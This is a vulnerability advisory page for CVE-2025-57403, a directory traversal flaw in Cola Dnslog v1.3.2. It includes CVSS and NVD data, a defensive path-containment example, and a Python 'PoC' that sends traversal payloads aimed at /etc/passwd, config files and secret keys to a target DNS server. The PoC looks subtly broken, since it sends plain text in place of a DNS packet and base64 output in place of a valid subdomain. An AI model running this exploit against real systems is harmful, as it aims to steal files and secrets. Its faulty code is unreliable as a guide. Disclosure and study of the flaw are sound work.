Security Vulnerability Report
CVE-2025-57403 CVSS 7.5 HIGH

CVE-2025-57403

Published: 2025-12-26 16:15:44
Last Modified: 2026-01-09 20:47:24

Description

Cola Dnslog v1.3.2 is vulnerable to Directory Traversal. When a DNS query for a TXT record is processed, the application concatenates the requested URL (or a portion of it) directly with a base path using os.path.join. This bypass allows directory traversal or absolute path injection, leading to the potential exposure of sensitive information.
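
The os.path.join behaviour the description refers to, shown beside a containment check. This is an added example, not Cola Dnslog's code; the function names, the temporary base directory and the sample request strings are assumptions constructed for illustration.

```python
import os
import tempfile

def naive_resolve(base_dir, requested):
    # Pattern named in the description: request text joined onto a base path.
    return os.path.normpath(os.path.join(base_dir, requested))

def is_inside(base_real, path):
    # True only for a path strictly below base_real.
    try:
        return os.path.commonpath([base_real, path]) == base_real and path != base_real
    except ValueError:  # e.g. paths on different drives on Windows
        return False

def safe_resolve(base_dir, requested):
    """Return the resolved path under base_dir, or None if the request escapes it."""
    if not requested or "\x00" in requested:
        return None
    base_real = os.path.realpath(base_dir)
    # os.path.join discards base_real when `requested` is absolute and keeps
    # ".." segments verbatim, so validate the final resolved path, not the input.
    candidate = os.path.realpath(os.path.join(base_real, requested))
    return candidate if is_inside(base_real, candidate) else None

# Constructed sample inputs (not taken from the project or from real traffic).
SAMPLE_REQUESTS = [
    "record.txt",
    "sub/../record.txt",
    "../" * 8 + "etc/passwd",
    "/etc/passwd",
]

def demo():
    """Map each sample to (naive result stays inside base, safe_resolve allows it)."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.realpath(tmp)
        with open(os.path.join(base, "record.txt"), "w") as fh:
            fh.write("ok")
        for req in SAMPLE_REQUESTS:
            naive = naive_resolve(base, req)
            results[req] = (is_inside(base, naive), safe_resolve(base, req) is not None)
    return results

if __name__ == "__main__":
    for req, (naive_ok, safe_ok) in demo().items():
        print(f"{req!r:40} naive inside base: {naive_ok!s:5} safe_resolve allows: {safe_ok}")
```

Because the check runs on the path after `realpath`, it also covers symlinks inside the base directory that point outside it.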

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:abelche:cola_dnslog:1.3.2:*:*:*:*:*:*:* - VULNERABLE
Cola Dnslog v1.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-57403 PoC - Cola Dnslog Directory Traversal
# Target: Cola Dnslog v1.3.2
# Vulnerability: Directory Traversal via DNS TXT record query

import socket
import base64


def exploit_cola_dnslog(target_ip, target_domain, file_path):
    """
    Exploit directory traversal vulnerability in Cola Dnslog
    by sending malicious DNS TXT record queries
    """
    # Construct malicious subdomain with path traversal
    # Try to read sensitive files like /etc/passwd
    traversal_payload = "../../../../.." + file_path

    # Encode to make it valid subdomain
    encoded_payload = base64.b64encode(traversal_payload.encode()).decode()

    # Create malicious DNS query
    malicious_subdomain = f"{encoded_payload}.{target_domain}"

    print(f"[*] Target: {target_ip}")
    print(f"[*] Malicious subdomain: {malicious_subdomain}")
    print(f"[*] Attempting to read: {file_path}")

    try:
        # Send DNS TXT query
        query = f"TXT {malicious_subdomain}"
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.sendto(query.encode(), (target_ip, 53))
        print("[+] Malicious DNS query sent")
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")


def verify_vulnerability(target_ip, target_domain):
    """
    Verify if the target is vulnerable
    """
    print("=" * 50)
    print("CVE-2025-57403 Verification")
    print("=" * 50)

    # Test files to read
    test_files = [
        "/etc/passwd",
        "/etc/hosts",
        "/app/config.py",
        "/app/secret.key"
    ]

    for file_path in test_files:
        exploit_cola_dnslog(target_ip, target_domain, file_path)


# Example usage
if __name__ == "__main__":
    target_ip = "<target_ip>"
    target_domain = "dnslog.example.com"
    verify_vulnerability(target_ip, target_domain)

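References

https://gist.github.com/Captaince/99b728c792c72b2666c2400625702df0
https://github.com/AbelChe/cola_dnslog/issues/29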

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57403", "sourceIdentifier": "[email protected]", "published": "2025-12-26T16:15:43.963", "lastModified": "2026-01-09T20:47:23.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cola Dnslog v1.3.2 is vulnerable to Directory Traversal. When a DNS query for a TXT record is processed, the application concatenates the requested URL (or a portion of it) directly with a base path using os.path.join. This bypass allows directory traversal or absolute path injection, leading to the potential exposure of sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:abelche:cola_dnslog:1.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDF381CB-2528-4BEE-B2BE-54A09FDB8430"}]}]}], "references": [{"url": "https://gist.github.com/Captaince/99b728c792c72b2666c2400625702df0", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/AbelChe/cola_dnslog/issues/29", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}